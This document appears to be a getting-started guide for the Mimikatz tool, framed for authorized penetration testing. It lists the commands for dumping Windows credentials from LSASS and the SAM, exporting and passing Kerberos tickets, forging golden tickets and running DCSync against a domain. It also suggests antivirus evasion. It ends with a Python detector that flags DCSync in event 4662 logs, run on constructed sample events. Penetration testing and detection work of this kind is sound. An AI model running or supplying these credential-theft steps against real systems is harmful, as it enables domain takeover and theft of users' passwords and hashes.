Getting Started Guide

How to Install and Use Mimikatz

This guide covers downloading Mimikatz and using it to extract credentials from Windows memory during authorized penetration tests.

Prerequisites

  • Windows (target system)
  • Administrator/SYSTEM privileges
  • Authorization to test the target system

1. Obtain Mimikatz

Download Mimikatz from the official GitHub repository. Note that antivirus will flag it.

Download

# Download from https://github.com/gentilkiwi/mimikatz/releases
# Extract zip
# Run mimikatz.exe from an admin command prompt

Or build from source

# Clone https://github.com/gentilkiwi/mimikatz
# Open mimikatz.sln in Visual Studio
# Build Release x64

Note: Every AV product detects mimikatz. In real engagements, operators often compile from source with modifications, use Invoke-Mimikatz (PowerShell), or dump LSASS memory and analyze it offline. For lab practice, add an AV exclusion.

2. Elevate Privileges

Mimikatz needs debug privileges to access LSASS process memory.

Enable debug privilege

privilege::debug

Check it worked

# Should output: Privilege '20' OK

Note: This requires running as Administrator. If you get 'ERROR kuhl_m_privilege_simple', you don't have sufficient privileges.

3. Dump Credentials

Extract plaintext passwords, NTLM hashes, and Kerberos tickets from memory.

Dump all credentials

sekurlsa::logonpasswords

Dump NTLM hashes

lsadump::sam

Dump cached domain credentials

lsadump::cache

Note: logonpasswords shows credentials for all logged-in users. On older Windows versions (pre-2012), you'll often get plaintext passwords. On newer versions, you get NTLM hashes, which can be cracked or used in pass-the-hash attacks.

4. Kerberos Attacks

Extract and manipulate Kerberos tickets for lateral movement.

List Kerberos tickets

kerberos::list

Export tickets

kerberos::list /export

Pass the ticket

kerberos::ptt ticket.kirbi

Golden ticket (requires krbtgt hash)

kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt

Note: Golden tickets give you unrestricted access to every service in the domain. This requires the krbtgt account hash, which you can get after compromising a domain controller with lsadump::dcsync.

5. DCSync Attack

Replicate credentials from a domain controller remotely, without touching the DC's disk.

DCSync specific user

lsadump::dcsync /domain:corp.local /user:Administrator

DCSync all users

lsadump::dcsync /domain:corp.local /all /csv

Note: DCSync requires Domain Admin or Replication rights. It simulates a domain controller requesting password replication, pulling NTLM hashes without needing to log into the DC. This is the cleanest way to extract domain credentials.
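Because DCSync is a replication request, its footprint on the domain controller is a Security event 4662 carrying the directory replication control-access rights from an account that is not a DC. The following detection logic is an added example (not part of this guide or the Mimikatz project); the event records and the DC allow-list are constructed, while the three GUIDs are the real Active Directory control-access-right identifiers.

```python
# Added example: flag Security event 4662 records that carry AD replication
# rights but were issued by an account that is not a domain controller.
# Event records below are constructed samples; the GUIDs are the real
# control-access-right GUIDs for the DS-Replication-Get-Changes family.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Hypothetical allow-list of DC computer accounts (trailing '$' as in the event).
KNOWN_DCS = {"DC01$", "DC02$"}


def replication_rights_requested(event):
    """Return the names of replication rights present in a 4662 Properties field."""
    props = event.get("Properties", "").lower()
    return sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)


def is_suspect_dcsync(event, known_dcs=KNOWN_DCS):
    """True when a 4662 from a non-DC account requests replication rights."""
    if event.get("EventID") != 4662:
        return False
    if event.get("SubjectUserName", "").upper() in known_dcs:
        return False  # DC-to-DC replication is expected
    return bool(replication_rights_requested(event))


def find_dcsync(events, known_dcs=KNOWN_DCS):
    """Return (account, [rights]) for every event that looks like DCSync."""
    return [(e["SubjectUserName"], replication_rights_requested(e))
            for e in events if is_suspect_dcsync(e, known_dcs)]


# Constructed sample events (fields mirror the 4662 XML data names).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},          # normal DC
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},       # suspect
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},          # unrelated object access
    {"EventID": 4624, "SubjectUserName": "jdoe", "Properties": ""},    # logon, not 4662
]

if __name__ == "__main__":
    for account, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Auditing "Directory Service Access" must be enabled on the DCs for 4662 to be logged, and accounts that legitimately replicate (for example Azure AD Connect's password hash sync account) need to be added to the allow-list.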
